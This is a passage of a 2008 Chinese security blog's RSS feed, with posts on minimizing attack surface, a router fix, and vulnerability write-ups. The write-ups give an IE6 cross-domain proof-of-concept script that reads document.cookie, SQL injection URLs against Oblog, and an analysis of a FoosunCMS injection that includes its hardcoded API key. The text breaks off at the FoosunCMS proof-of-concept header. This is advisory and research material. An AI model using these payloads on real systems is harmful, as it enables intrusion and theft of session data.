&lt;p&gt;可能很多人会觉得这样太麻烦了，但我这里讲的是一套科学的方法，而不是拍拍脑袋就能够得出结论的“经验流”，这样得出的结论才有信服力。所以，如果你想让你的老板觉得你足够严谨，那么还是老老实实的分析下数据流图吧！&lt;/p&gt;
&lt;p&gt;根据数据流图，你就可以看到正常的、非正常的可以接触到你需要保护的资产的途径了。&lt;/p&gt;
&lt;p&gt;你保护的资产可能是一个db，可能是一个vlan，也可能是你BOSS电脑里的小电影。根据不同的资产种类，和到达资产的途径，你就可以开始设计你的安全体系了。&lt;/p&gt;
&lt;p&gt;首先根据你的分析结果，看看结合现在的架构，有什么是可以做到&lt;strong&gt;彻底杜绝&lt;/strong&gt;的，有什么是可以慢慢控制&lt;strong&gt;收敛&lt;/strong&gt;的。&lt;/p&gt;
&lt;p&gt;比如你担心“员工电脑被木马控制“，那么是否可以让员工只拥有user权限，是否可以升级办公PC到vista，是否可以要求只能使用内部代理上网，是否可以限制办公环境的PC只能上指定网站，是否需要把客服部门单独孤立出来。&lt;/p&gt;
&lt;p&gt;这些，就是可以让”员工电脑被木马控制“这一个威胁得到收敛的有效措施。&lt;/p&gt;
&lt;p&gt;可以根据你设计的深度防御体系，从各个层面来加以保护。如果要我起个名字，我可以把这种多层次防护叫做： &lt;strong&gt;Defense-Stack&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Defense-Stack 和 Attack-Surface 是可以正交的，正交的那些点，就是以后工作的焦点和重点。&lt;/p&gt;
&lt;p&gt;最后需要注意的是，制度是需要&lt;strong&gt;有人维护&lt;/strong&gt;的，加入了人的因素，才能真正做到minimize attack surface，让你的防御体系转起来。&lt;/p&gt;
&lt;p&gt;想法都比较零碎，还没系统的整理过，先讲到这里，以后再补充。&lt;/p&gt;
&lt;hr /&gt;
&lt;a href=&quot;http://huaidan.org/archives/2117.html#addcomment&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;发表评论&lt;/strong&gt;&lt;/a&gt; | 分类：&lt;a href=&quot;http://huaidan.org/archives/category/technology&quot; title=&quot;显示技术文章的所有日志&quot; rel=&quot;category tag&quot;&gt;技术文章&lt;/a&gt;&lt;br /&gt;
本文网址：&lt;a href=&quot;http://huaidan.org/archives/2117.html&quot; target=&quot;_blank&quot;&gt;http://huaidan.org/archives/2117.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;
&lt;small&gt;&amp;copy; 鬼仔 for &lt;a href=&quot;http://huaidan.org&quot; target=&quot;_blank&quot;&gt;鬼仔's Blog&lt;/a&gt;, 2008. | Add to &lt;a href=&quot;http://del.icio.us/post?url=http://huaidan.org/archives/2117.html&amp;amp;title=关于minimize attack surface&quot; target=&quot;_blank&quot;&gt;del.icio.us&lt;/a&gt; &lt;a href=&quot;http://www.digg.com/submit&quot; target=&quot;_blank&quot;&gt;digg&lt;/a&gt; | Who's linking ? &lt;a title=&quot;Search on Technorati&quot; href=&quot;http://www.technorati.com/search/http://huaidan.org/archives/2117.html&quot; target=&quot;_blank&quot;&gt;Technorati&lt;/a&gt; &lt;a title=&quot;Search on Google Blog Search&quot; href=&quot;http://google.com/blogsearch?q=http://huaidan.org/archives/2117.html&quot; target=&quot;_blank&quot;&gt;Google&lt;/a&gt; &lt;a title=&quot;Search on Blogpulse&quot; href=&quot;http://www.blogpulse.com/search?query=http://huaidan.org/archives/2117.html&quot; target=&quot;_blank&quot;&gt;BlogPulse&lt;/a&gt;. &lt;/small&gt;
	&lt;h4&gt;相关日志&lt;/h4&gt;
	&lt;ul class=&quot;st-related-posts&quot;&gt;
	&lt;li&gt;无相关日志&lt;/li&gt;
	&lt;/ul&gt;&lt;br /&gt;&lt;!-- Feedsky ad --&gt;&lt;a href=&quot;http://feed.feedsky.com/~cpm/c/sunlei/5e561fff1201fa722e92bee4446420dc&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~cpm/sunlei/5e561fff1201fa722e92bee4446420dc/s.gif&quot; border=&quot;0&quot; style=&quot;margin-top:5px;&quot; /&gt;&lt;/a&gt;&lt;!-- /Feedsky ad --&gt;</content:encoded><wfw:commentRss>http://huaidan.org/archives/2117.html/feed</wfw:commentRss><description>BY:刺
最近看到又有老外讲到这一点，先扯扯我的体会。
minimize attack surface就是要尽量减少可能被攻击的点。
从战略上来讲，就是解决或者隐藏自己的弱点。
要做到这点，首先需要的就是一个...&lt;br /&gt;&lt;!-- Feedsky ad --&gt;&lt;a href=&quot;http://feed.feedsky.com/~cpm/c/sunlei/5e561fff1201fa722e92bee4446420dc&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~cpm/sunlei/5e561fff1201fa722e92bee4446420dc/s.gif&quot; border=&quot;0&quot; style=&quot;margin-top:5px;&quot; /&gt;&lt;/a&gt;&lt;!-- /Feedsky ad --&gt;</description><category>技术文章</category><pubDate>Tue, 01 Jul 2008 00:32:26 +0800</pubDate><author>鬼仔</author><comments>http://huaidan.org/archives/2117.html#comments</comments><guid isPermaLink="false">http://huaidan.org/?p=2117</guid><dc:creator>鬼仔</dc:creator><fs:srclink>http://huaidan.org/archives/2117.html</fs:srclink><fs:srcfeed>http://huaidan.org/feed</fs:srcfeed><fs:itemid>feedsky/sunlei/~7027661/88996627/1230972</fs:itemid></item><item><title>Microsoft IE location及location.href绕过跨域安全限制漏洞</title><link>http://huaidan.org/archives/2116.html</link><content:encoded>&lt;p&gt;发布日期：2008-06-26&lt;br /&gt;
更新日期：2008-06-27&lt;/p&gt;
&lt;p&gt;受影响系统：&lt;/p&gt;
&lt;p&gt;Microsoft Internet Explorer 6.0&lt;br /&gt;
- Microsoft Windows XP SP2&lt;/p&gt;
&lt;p&gt;描述：BUGTRAQ  ID: 29960&lt;/p&gt;
&lt;p&gt;Internet Explorer是微软发布的非常流行的WEB浏览器。&lt;/p&gt;
&lt;p&gt;IE没有正确地处理窗口对象的location或location.href属性，如果用户受骗访问了恶意站点的话，就会绕过跨域安全限制，在用户浏览器会话中执行任意指令。&lt;br /&gt;
&lt;span id=&quot;more-2116&quot;&gt;&lt;/span&gt;&lt;br /&gt;
这个跨域安全问题的本质是浏览器在处理window对象的操作有所疏漏，没有考虑清楚不同域有继承关系的window对象操作后的变化，只是对window对象的一些方法的参数做了类似数据类型的限制，导致最后绕过限制跨域执行了脚本。&lt;/p&gt;
&lt;p&gt;&amp;lt;*来源：rayh4c （rayh4c@80sec.com）&lt;/p&gt;
&lt;p&gt;链接：&lt;a title=&quot;http://secunia.com/advisories/30857/&quot; href=&quot;http://secunia.com/advisories/30857/&quot; target=&quot;_blank&quot;&gt;http://secunia.com/advisories/30857/&lt;/a&gt;&lt;br /&gt;
&lt;a title=&quot;http://blogs.zdnet.com/security/?p=1348&quot; href=&quot;http://blogs.zdnet.com/security/?p=1348&quot; target=&quot;_blank&quot;&gt;http://blogs.zdnet.com/security/?p=1348&lt;/a&gt;&lt;br /&gt;
&lt;a title=&quot;http://www.ph4nt0m.org-a.googlepages.com/PSTZine_0x02_0x04.txt&quot; href=&quot;http://www.ph4nt0m.org-a.googlepages.com/PSTZine_0x02_0x04.txt&quot; target=&quot;_blank&quot;&gt;http://www.ph4nt0m.org-a.googlepages.com/PSTZine_0x02_0x04.txt&lt;/a&gt;&lt;br /&gt;
&lt;a title=&quot;http://www.kb.cert.org/vuls/id/923508&quot; href=&quot;http://www.kb.cert.org/vuls/id/923508&quot; target=&quot;_blank&quot;&gt;http://www.kb.cert.org/vuls/id/923508&lt;/a&gt;&lt;br /&gt;
*&amp;gt;&lt;/p&gt;
&lt;p&gt;测试方法：&lt;/p&gt;
&lt;p&gt;警 告&lt;/p&gt;
&lt;p&gt;以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！&lt;br /&gt;
&amp;lt;a href=&quot;&quot;&amp;gt;IE6 Cross Domain Scripting&amp;lt;/a&amp;gt;&lt;br /&gt;
&amp;lt;script&amp;gt;&lt;br /&gt;
function win(){&lt;br /&gt;
x=window.open('&lt;a title=&quot;http://www.phpwind.net&amp;amp;#39;&quot; href=&quot;http://www.phpwind.net&amp;amp;/#39;&quot; target=&quot;_blank&quot;&gt;http://www.phpwind.net&amp;amp;#39;&lt;/a&gt;);&lt;br /&gt;
setTimeout(function(){&lt;br /&gt;
x.location=new String(&quot;javascript:alert(document.cookie)&quot;)&lt;br /&gt;
},3000)&lt;br /&gt;
}&lt;br /&gt;
window.onload=function(){&lt;br /&gt;
for (i=0;i&amp;lt;document.links.length;i++) {&lt;br /&gt;
document.links.href=&quot;javascript:win()&quot;&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;/p&gt;
&lt;p&gt;建议：厂商补丁：&lt;/p&gt;
&lt;p&gt;Microsoft&lt;br /&gt;
---------&lt;br /&gt;
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：&lt;/p&gt;
&lt;p&gt;&lt;a title=&quot;http://www.microsoft.com/windows/ie/default.asp&quot; href=&quot;http://www.microsoft.com/windows/ie/default.asp&quot; target=&quot;_blank&quot;&gt;http://www.microsoft.com/windows/ie/default.asp&lt;/a&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;a href=&quot;http://huaidan.org/archives/2116.html#addcomment&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;发表评论&lt;/strong&gt;&lt;/a&gt; | 分类：&lt;a href=&quot;http://huaidan.org/archives/category/technology&quot; title=&quot;显示技术文章的所有日志&quot; rel=&quot;category tag&quot;&gt;技术文章&lt;/a&gt;&lt;br /&gt;
本文网址：&lt;a href=&quot;http://huaidan.org/archives/2116.html&quot; target=&quot;_blank&quot;&gt;http://huaidan.org/archives/2116.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;
&lt;small&gt;&amp;copy; 鬼仔 for &lt;a href=&quot;http://huaidan.org&quot; target=&quot;_blank&quot;&gt;鬼仔's Blog&lt;/a&gt;, 2008. | Add to &lt;a href=&quot;http://del.icio.us/post?url=http://huaidan.org/archives/2116.html&amp;amp;title=Microsoft IE location及location.href绕过跨域安全限制漏洞&quot; target=&quot;_blank&quot;&gt;del.icio.us&lt;/a&gt; &lt;a href=&quot;http://www.digg.com/submit&quot; target=&quot;_blank&quot;&gt;digg&lt;/a&gt; | Who's linking ? &lt;a title=&quot;Search on Technorati&quot; href=&quot;http://www.technorati.com/search/http://huaidan.org/archives/2116.html&quot; target=&quot;_blank&quot;&gt;Technorati&lt;/a&gt; &lt;a title=&quot;Search on Google Blog Search&quot; href=&quot;http://google.com/blogsearch?q=http://huaidan.org/archives/2116.html&quot; target=&quot;_blank&quot;&gt;Google&lt;/a&gt; &lt;a title=&quot;Search on Blogpulse&quot; href=&quot;http://www.blogpulse.com/search?query=http://huaidan.org/archives/2116.html&quot; target=&quot;_blank&quot;&gt;BlogPulse&lt;/a&gt;. &lt;/small&gt;
	&lt;h4&gt;相关日志&lt;/h4&gt;
	&lt;ul class=&quot;st-related-posts&quot;&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/627.html&quot; title=&quot;过Windows SP2的IE_VML网页木马生成器 (2006/09/27)&quot;&gt;过Windows SP2的IE_VML网页木马生成器&lt;/a&gt; (3)&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/1970.html&quot; title=&quot;找回Windows XP SP3的IE图标 (2008/05/11)&quot;&gt;找回Windows XP SP3的IE图标&lt;/a&gt; (7)&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/534.html&quot; title=&quot;复制图片链接 for IE (2006/07/04)&quot;&gt;复制图片链接 for IE&lt;/a&gt; (0)&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/747.html&quot; title=&quot;同时运行 IE6 和 IE7 绿色版 (2006/12/01)&quot;&gt;同时运行 IE6 和 IE7 绿色版&lt;/a&gt; (0)&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/1276.html&quot; title=&quot;只需一行代码就能让IE 6崩溃 (2007/08/07)&quot;&gt;只需一行代码就能让IE 6崩溃&lt;/a&gt; (0)&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;&lt;!-- Feedsky ad --&gt;&lt;a href=&quot;http://feed.feedsky.com/~cpm/c/sunlei/07cfd7aa3a69aacec806fdcf181ede52&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~cpm/sunlei/07cfd7aa3a69aacec806fdcf181ede52/s.gif&quot; border=&quot;0&quot; style=&quot;margin-top:5px;&quot; /&gt;&lt;/a&gt;&lt;!-- /Feedsky ad --&gt;</content:encoded><wfw:commentRss>http://huaidan.org/archives/2116.html/feed</wfw:commentRss><description>发布日期：2008-06-26
更新日期：2008-06-27
受影响系统：
Microsoft Internet Explorer 6.0
- Microsoft Windows XP SP2
描述：BUGTRAQ  ID: 29960
Internet Explorer是微软发布的非常流行的WEB浏览器。
IE没有正确地处理窗口...&lt;br /&gt;&lt;!-- Feedsky ad --&gt;&lt;a href=&quot;http://feed.feedsky.com/~cpm/c/sunlei/07cfd7aa3a69aacec806fdcf181ede52&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~cpm/sunlei/07cfd7aa3a69aacec806fdcf181ede52/s.gif&quot; border=&quot;0&quot; style=&quot;margin-top:5px;&quot; /&gt;&lt;/a&gt;&lt;!-- /Feedsky ad --&gt;</description><category>技术文章</category><category>IE</category><pubDate>Tue, 01 Jul 2008 00:31:34 +0800</pubDate><author>鬼仔</author><comments>http://huaidan.org/archives/2116.html#comments</comments><guid isPermaLink="false">http://huaidan.org/?p=2116</guid><dc:creator>鬼仔</dc:creator><fs:srclink>http://huaidan.org/archives/2116.html</fs:srclink><fs:srcfeed>http://huaidan.org/feed</fs:srcfeed><fs:itemid>feedsky/sunlei/~7027661/88996628/1230972</fs:itemid></item><item><title>Oblog最新注入漏洞分析(已修补)</title><link>http://huaidan.org/archives/2115.html</link><content:encoded>&lt;p&gt;Date：2008-5-15&lt;br /&gt;
Author：Yamato[BCT]&lt;br /&gt;
Version：Oblog 4.5-4.6 sql&lt;/p&gt;
&lt;p&gt;代码分析：&lt;/p&gt;
&lt;p&gt;文件In/Class_UserCommand.asp :&lt;/p&gt;
&lt;p&gt;strMonth=Request(&quot;month&quot;) //第63行&lt;/p&gt;
&lt;p&gt;strDay=Request(&quot;day&quot;)&lt;/p&gt;
&lt;p&gt;……&lt;br /&gt;
&lt;span id=&quot;more-2115&quot;&gt;&lt;/span&gt;&lt;br /&gt;
Case &quot;month&quot; //第84行&lt;/p&gt;
&lt;p&gt;Dim LastDay&lt;/p&gt;
&lt;p&gt;G_P_FileName = G_P_FileName &amp;amp; &quot;month&amp;amp;month=&quot; &amp;amp; strMonth&lt;/p&gt;
&lt;p&gt;strDay=Left(strMonth,4) &amp;amp; &quot;-&quot; &amp;amp; Right(strMonth,2) &amp;amp; &quot;-01&quot;&lt;/p&gt;
&lt;p&gt;mYear=Left(strMonth,4)&lt;/p&gt;
&lt;p&gt;mMonth=Right(strMonth,2)&lt;/p&gt;
&lt;p&gt;If InStr (&quot;01,03,05,07,08,10,12&quot;,mMonth)&amp;gt; 0 Then&lt;/p&gt;
&lt;p&gt;LastDay = &quot;31&quot;……&lt;/p&gt;
&lt;p&gt;Else //第109行&lt;/p&gt;
&lt;p&gt;SqlPart = &quot; And Addtime &amp;gt;='&quot;&amp;amp;strMonth&amp;amp;&quot;01' AND Addtime &amp;lt; '&quot;&amp;amp;strMonth&amp;amp;LastDay&amp;amp;&quot;' &quot;&lt;/p&gt;
&lt;p&gt;构造合适的变量strMonth进行注射&lt;/p&gt;
&lt;p&gt;测试方法:&lt;/p&gt;
&lt;p&gt;http://localhost/oblog/cmd.asp?do= month&amp;amp;month=2008’ and user&amp;gt;0--01&lt;/p&gt;
&lt;p&gt;strDay变量从month中获得日期数据，并判断strDay是否为日期数据。所以构造的注射语句为：&lt;/p&gt;
&lt;p&gt;http://localhost/oblog/cmd.asp?do= month&amp;amp;month=2008’(自己的sql语句)--01&lt;/p&gt;
&lt;p&gt;执行sql语句采用rst.Open strSql,Conn,1,1&lt;/p&gt;
&lt;p&gt;不能修改记录集.&lt;/p&gt;
&lt;hr /&gt;
&lt;a href=&quot;http://huaidan.org/archives/2115.html#addcomment&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;发表评论&lt;/strong&gt;&lt;/a&gt; | 分类：&lt;a href=&quot;http://huaidan.org/archives/category/technology&quot; title=&quot;显示技术文章的所有日志&quot; rel=&quot;category tag&quot;&gt;技术文章&lt;/a&gt;&lt;br /&gt;
本文网址：&lt;a href=&quot;http://huaidan.org/archives/2115.html&quot; target=&quot;_blank&quot;&gt;http://huaidan.org/archives/2115.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;
&lt;small&gt;&amp;copy; 鬼仔 for &lt;a href=&quot;http://huaidan.org&quot; target=&quot;_blank&quot;&gt;鬼仔's Blog&lt;/a&gt;, 2008. | Add to &lt;a href=&quot;http://del.icio.us/post?url=http://huaidan.org/archives/2115.html&amp;amp;title=Oblog最新注入漏洞分析(已修补)&quot; target=&quot;_blank&quot;&gt;del.icio.us&lt;/a&gt; &lt;a href=&quot;http://www.digg.com/submit&quot; target=&quot;_blank&quot;&gt;digg&lt;/a&gt; | Who's linking ? &lt;a title=&quot;Search on Technorati&quot; href=&quot;http://www.technorati.com/search/http://huaidan.org/archives/2115.html&quot; target=&quot;_blank&quot;&gt;Technorati&lt;/a&gt; &lt;a title=&quot;Search on Google Blog Search&quot; href=&quot;http://google.com/blogsearch?q=http://huaidan.org/archives/2115.html&quot; target=&quot;_blank&quot;&gt;Google&lt;/a&gt; &lt;a title=&quot;Search on Blogpulse&quot; href=&quot;http://www.blogpulse.com/search?query=http://huaidan.org/archives/2115.html&quot; target=&quot;_blank&quot;&gt;BlogPulse&lt;/a&gt;. &lt;/small&gt;
	&lt;h4&gt;相关日志&lt;/h4&gt;
	&lt;ul class=&quot;st-related-posts&quot;&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/1779.html&quot; title=&quot;最新Oblog4.6注入漏洞分析之二 (2008/03/14)&quot;&gt;最新Oblog4.6注入漏洞分析之二&lt;/a&gt; (0)&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/1456.html&quot; title=&quot;惊爆oblog4.6 0day (2007/11/07)&quot;&gt;惊爆oblog4.6 0day&lt;/a&gt; (0)&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/1943.html&quot; title=&quot;[五一礼物] 真的补了吗 Oblog漏洞重现 (2008/05/01)&quot;&gt;[五一礼物] 真的补了吗 Oblog漏洞重现&lt;/a&gt; (3)&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/1772.html&quot; title=&quot;Oblog注入漏洞分析 (2008/03/13)&quot;&gt;Oblog注入漏洞分析&lt;/a&gt; (0)&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/1843.html&quot; title=&quot;oblog文件下载漏洞 (2008/04/03)&quot;&gt;oblog文件下载漏洞&lt;/a&gt; (0)&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;&lt;!-- Feedsky ad --&gt;&lt;a href=&quot;http://feed.feedsky.com/~cpm/c/sunlei/dd25225ef35f4a606b67cd8cc991a48c&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~cpm/sunlei/dd25225ef35f4a606b67cd8cc991a48c/s.gif&quot; border=&quot;0&quot; style=&quot;margin-top:5px;&quot; /&gt;&lt;/a&gt;&lt;!-- /Feedsky ad --&gt;</content:encoded><wfw:commentRss>http://huaidan.org/archives/2115.html/feed</wfw:commentRss><description>Date：2008-5-15
Author：Yamato[BCT]
Version：Oblog 4.5-4.6 sql
代码分析：
文件In/Class_UserCommand.asp :
strMonth=Request(&quot;month&quot;) //第63行
strDay=Request(&quot;day&quot;)
……

Case &quot;month&quot; //第84行
Dim LastDay
G_P_FileName = G_P_FileName &amp;#38; &quot;m...&lt;br /&gt;&lt;!-- Feedsky ad --&gt;&lt;a href=&quot;http://feed.feedsky.com/~cpm/c/sunlei/dd25225ef35f4a606b67cd8cc991a48c&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~cpm/sunlei/dd25225ef35f4a606b67cd8cc991a48c/s.gif&quot; border=&quot;0&quot; style=&quot;margin-top:5px;&quot; /&gt;&lt;/a&gt;&lt;!-- /Feedsky ad --&gt;</description><category>OBlog</category><category>漏洞</category><category>技术文章</category><pubDate>Mon, 30 Jun 2008 13:08:03 +0800</pubDate><author>鬼仔</author><comments>http://huaidan.org/archives/2115.html#comments</comments><guid isPermaLink="false">http://huaidan.org/?p=2115</guid><dc:creator>鬼仔</dc:creator><fs:srclink>http://huaidan.org/archives/2115.html</fs:srclink><fs:srcfeed>http://huaidan.org/feed</fs:srcfeed><fs:itemid>feedsky/sunlei/~7027661/88854176/1230972</fs:itemid></item><item><title>TP-Link TL-WR541G+ 无故自动重启的解决办法</title><link>http://huaidan.org/archives/2114.html</link><content:encoded>&lt;p&gt;自从买了这个无线路由就一直存在这个问题，刚开始以为是路由的问题，专门跑去换了一个，结果问题依然存在。发邮件给tp-link的客服，他们第一个反应竟然是让我去看看无线的密码是不是被人猜到了，是否别人认为重启的。排除这个原因，他们又让我关掉无线功能，还是不行。&lt;br /&gt;
后来看到这样一个消息：&lt;a title=&quot;Windows XP SP3会引起路由器崩溃&quot; rel=&quot;bookmark&quot; href=&quot;http://huaidan.org/archives/2062.html&quot;&gt;Windows XP SP3会引起路由器崩溃&lt;/a&gt; ，然后就想着等有空了把sp3卸载了试试。当时发邮件给tp-link的客服，问他们是否sp3会引起这个问题，他们说WR541G+这款不会受sp3影响。&lt;/p&gt;
&lt;p&gt;昨天又试着搜下看看有没有人跟我遇到同样的问题，结果还真被我&lt;a href=&quot;http://group.zol.com.cn/1/227_3579.html&quot;&gt;搜到&lt;/a&gt;了。&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;解决办法如下：&lt;/strong&gt;&lt;br /&gt;
&lt;span id=&quot;more-2114&quot;&gt;&lt;/span&gt;&lt;br /&gt;
1、在 “安全设置”-&gt;“防火墙设置”里勾选“开启防火墙（防火墙的总开关）”&lt;br /&gt;
2、在 “安全设置”-&gt;“高级安全设置”勾选和启用所有功能，参数全部默认。&lt;/p&gt;
&lt;p&gt;昨天我这样设置之后，到现在还没有再发生过无故自动重启的问题。&lt;/p&gt;
&lt;hr /&gt;
&lt;a href=&quot;http://huaidan.org/archives/2114.html#addcomment&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;发表评论&lt;/strong&gt;&lt;/a&gt; | 分类：&lt;a href=&quot;http://huaidan.org/archives/category/others&quot; title=&quot;显示乱七八糟的所有日志&quot; rel=&quot;category tag&quot;&gt;乱七八糟&lt;/a&gt;&lt;br /&gt;
本文网址：&lt;a href=&quot;http://huaidan.org/archives/2114.html&quot; target=&quot;_blank&quot;&gt;http://huaidan.org/archives/2114.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;
&lt;small&gt;&amp;copy; 鬼仔 for &lt;a href=&quot;http://huaidan.org&quot; target=&quot;_blank&quot;&gt;鬼仔's Blog&lt;/a&gt;, 2008. | Add to &lt;a href=&quot;http://del.icio.us/post?url=http://huaidan.org/archives/2114.html&amp;amp;title=TP-Link TL-WR541G+ 无故自动重启的解决办法&quot; target=&quot;_blank&quot;&gt;del.icio.us&lt;/a&gt; &lt;a href=&quot;http://www.digg.com/submit&quot; target=&quot;_blank&quot;&gt;digg&lt;/a&gt; | Who's linking ? &lt;a title=&quot;Search on Technorati&quot; href=&quot;http://www.technorati.com/search/http://huaidan.org/archives/2114.html&quot; target=&quot;_blank&quot;&gt;Technorati&lt;/a&gt; &lt;a title=&quot;Search on Google Blog Search&quot; href=&quot;http://google.com/blogsearch?q=http://huaidan.org/archives/2114.html&quot; target=&quot;_blank&quot;&gt;Google&lt;/a&gt; &lt;a title=&quot;Search on Blogpulse&quot; href=&quot;http://www.blogpulse.com/search?query=http://huaidan.org/archives/2114.html&quot; target=&quot;_blank&quot;&gt;BlogPulse&lt;/a&gt;. &lt;/small&gt;
	&lt;h4&gt;相关日志&lt;/h4&gt;
	&lt;ul class=&quot;st-related-posts&quot;&gt;
	&lt;li&gt;无相关日志&lt;/li&gt;
	&lt;/ul&gt;&lt;br /&gt;&lt;!-- Feedsky ad --&gt;&lt;a href=&quot;http://feed.feedsky.com/~cpm/c/sunlei/2a24276cf9dcfe0bceab4d76257e5ddf&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~cpm/sunlei/2a24276cf9dcfe0bceab4d76257e5ddf/s.gif&quot; border=&quot;0&quot; style=&quot;margin-top:5px;&quot; /&gt;&lt;/a&gt;&lt;!-- /Feedsky ad --&gt;</content:encoded><wfw:commentRss>http://huaidan.org/archives/2114.html/feed</wfw:commentRss><description>自从买了这个无线路由就一直存在这个问题，刚开始以为是路由的问题，专门跑去换了一个，结果问题依然存在。发邮件给tp-link的客服，他们第一个反应竟然是让我去看看无线的密码是不是被...&lt;br /&gt;&lt;!-- Feedsky ad --&gt;&lt;a href=&quot;http://feed.feedsky.com/~cpm/c/sunlei/2a24276cf9dcfe0bceab4d76257e5ddf&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~cpm/sunlei/2a24276cf9dcfe0bceab4d76257e5ddf/s.gif&quot; border=&quot;0&quot; style=&quot;margin-top:5px;&quot; /&gt;&lt;/a&gt;&lt;!-- /Feedsky ad --&gt;</description><category>乱七八糟</category><category>TP-Link</category><pubDate>Sun, 29 Jun 2008 21:06:26 +0800</pubDate><author>鬼仔</author><comments>http://huaidan.org/archives/2114.html#comments</comments><guid isPermaLink="false">http://huaidan.org/?p=2114</guid><dc:creator>鬼仔</dc:creator><fs:srclink>http://huaidan.org/archives/2114.html</fs:srclink><fs:srcfeed>http://huaidan.org/feed</fs:srcfeed><fs:itemid>feedsky/sunlei/~7027661/88676653/1230972</fs:itemid></item><item><title>FoosunCMS Sql Injection Vulnerability</title><link>http://huaidan.org/archives/2112.html</link><content:encoded>&lt;p&gt;--==+=================== &lt;a href=&quot;http://www.nspcn.org/&quot;&gt;www.nspcn.org&lt;/a&gt; =================+==--&lt;br /&gt;
--==+ FoosunCMS (API_Response.asp) Remote SQL Injection Exploit +==--&lt;br /&gt;
--==+===================================================+==--&lt;/p&gt;
&lt;p&gt;#Author: Tr4c3[at]126[dot]com&lt;br /&gt;
#版权所有: &lt;a href=&quot;http://www.nspcn.org/&quot;&gt;http://www.nspcn.org&lt;/a&gt; &amp;amp; [BK瞬间群]&lt;br /&gt;
#漏洞文件 API/API_Response.asp&lt;br /&gt;
#影响版本:&lt;br /&gt;
v4.0 Sp5[其他版本未看]&lt;br /&gt;
#漏洞原因:&lt;br /&gt;
变量username未经过滤传值，带入sql执行，导致注入产生。&lt;br /&gt;
#关键代码：&lt;br /&gt;
&lt;span id=&quot;more-2112&quot;&gt;&lt;/span&gt;&lt;br /&gt;
If CheckPost() Then&lt;br /&gt;
Select Case Act&lt;br /&gt;
Case &quot;checkname&quot; '触发注入&lt;br /&gt;
Checkname()&lt;br /&gt;
CheckPost()函数原型在行73-96，username由此获取值，代码如下:&lt;br /&gt;
XmlDoc.documentElement.selectSingleNode(&quot;username&quot;)&lt;br /&gt;
Checkname()函数在行233-254，代码如下：&lt;br /&gt;
Sub Checkname()&lt;br /&gt;
Dim UserEmail&lt;br /&gt;
Dim Temp_tr,i,Rs,Sql&lt;br /&gt;
UserEmail = Trim(XmlDoc.documentElement.selectSingleNode(&quot;email&quot;).text)&lt;br /&gt;
If Messenge&amp;lt;&amp;gt;&quot;&quot; Then&lt;br /&gt;
'输出错误信息&lt;br /&gt;
Status = 1&lt;br /&gt;
Exit Sub&lt;br /&gt;
End If&lt;br /&gt;
Sql=&quot;select UserName,Email From FS_ME_Users where UserName = '&quot;&amp;amp; UserName &amp;amp;&quot;'&quot; '在此带入sql执行&lt;br /&gt;
Set Rs = User_Conn.Execute(Sql)&lt;br /&gt;
If Not Rs.Eof And Not Rs.Bof Then&lt;br /&gt;
Messenge = &quot;您填写的用户名已经被注册。&quot;&lt;br /&gt;
Status = 1&lt;br /&gt;
Exit Sub&lt;br /&gt;
Else&lt;br /&gt;
Status = 0&lt;br /&gt;
Messenge = &quot;验证通过。&quot;&lt;br /&gt;
End If&lt;br /&gt;
Rs.Close&lt;br /&gt;
Set Rs = Nothing&lt;br /&gt;
End Sub&lt;/p&gt;
&lt;p&gt;利用的关键在于让CheckPost()为真，代码如下：&lt;br /&gt;
Dim NewMd5,OldMd5&lt;br /&gt;
NewMd5 = Md5(UserName&amp;amp;API_SysKey,16) 'Const API_SysKey = &quot;API_TEST&quot;&lt;br /&gt;
OldMd5 = Md5(UserName&amp;amp;API_SysKey,16)&lt;/p&gt;
&lt;p&gt;If Syskey=NewMd5 or Syskey=OldMd5 Then&lt;br /&gt;
CheckPost = True&lt;br /&gt;
Else&lt;br /&gt;
Status = 1&lt;br /&gt;
Messenge = Messenge &amp;amp; &quot;&amp;lt;li&amp;gt;请求数据验证不通过，请与管理员联系。&quot;&lt;br /&gt;
End If&lt;br /&gt;
API_SysKey在Api_Config.asp里16行被设置&lt;br /&gt;
Const API_SysKey = &quot;API_TEST&quot;&lt;br /&gt;
把注入语句 &amp;amp; API_SysKey 进行一次md5加密之后的16位hash，赋值给syskey就可以了。&lt;br /&gt;
###Poc：&lt;br /&gt;
Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-&lt;br /&gt;
